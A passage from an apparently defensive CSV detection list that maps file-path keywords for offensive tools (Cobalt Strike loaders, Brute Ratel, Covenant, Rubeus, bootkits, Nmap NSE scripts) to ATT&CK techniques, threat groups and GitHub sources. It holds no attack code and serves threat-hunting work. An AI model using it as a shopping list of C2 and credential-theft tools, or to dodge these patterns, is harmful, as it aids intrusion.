- LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader/*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BooExecutor.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*/bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*/bq1iFEP2/assert/dll/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*/bq1iFEP2/assert/exe/*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/breg.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*/breg.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*/broadcast-ataoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-avahi-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-db2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dhcp6-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-dropbox-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-eigrp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-hid-discoveryd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-igmp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-jenkins-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ms-sql-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-netbios-master-browser.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-networker-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-novell-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ospf2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pc-anywhere.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pc-duo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pim-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-pppoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-rip-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-ripng-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-sonicwall-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-sybase-asa-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-tellstick-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-versant-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-wake-on-lan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-wpad-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/broadcast-xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Bropper.git*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*/bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*/Browser-C2*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" +"*/Brute/BruteStager*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/bruteforce.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/bruteratel*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/BruteSploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/brutespray/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BruteStager.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/BucketLoot.git*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" +"*/build/encrypted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 